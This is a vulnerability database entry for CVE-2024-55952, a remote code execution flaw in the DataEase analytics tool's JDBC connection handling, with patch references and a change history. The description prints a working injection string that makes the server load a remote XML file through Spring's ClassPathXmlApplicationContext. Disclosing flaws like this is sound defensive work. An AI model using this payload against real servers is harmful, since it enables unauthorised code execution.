DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.
References
Link | Resource |
---|---|
https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1 | Patch |
https://github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qw | Exploit Vendor Advisory |
Configurations
History
20 Feb 2025, 16:22
Type | Values Removed | Values Added |
---|---|---|
CWE | NVD-CWE-noinfo | |
CVSS |
v2 : v3 : |
v2 : unknown
v3 : 8.8 |
CPE | cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* | |
First Time |
Dataease
Dataease dataease |
|
References | () https://github.com/dataease/dataease/commit/0db4872a52eccf6e83dd9359aa05db52dd580ec1 - Patch | |
References | () https://github.com/dataease/dataease/security/advisories/GHSA-w8qm-xw38-93qw - Exploit, Vendor Advisory | |
Summary |
|
18 Dec 2024, 19:15
Type | Values Removed | Values Added |
---|---|---|
New CVE |
Information
Published : 2024-12-18 19:15
Updated : 2025-02-20 16:22
NVD link : CVE-2024-55952
Mitre link : CVE-2024-55952
CVE.ORG link : CVE-2024-55952
JSON object : View
Products Affected
dataease
- dataease
CWE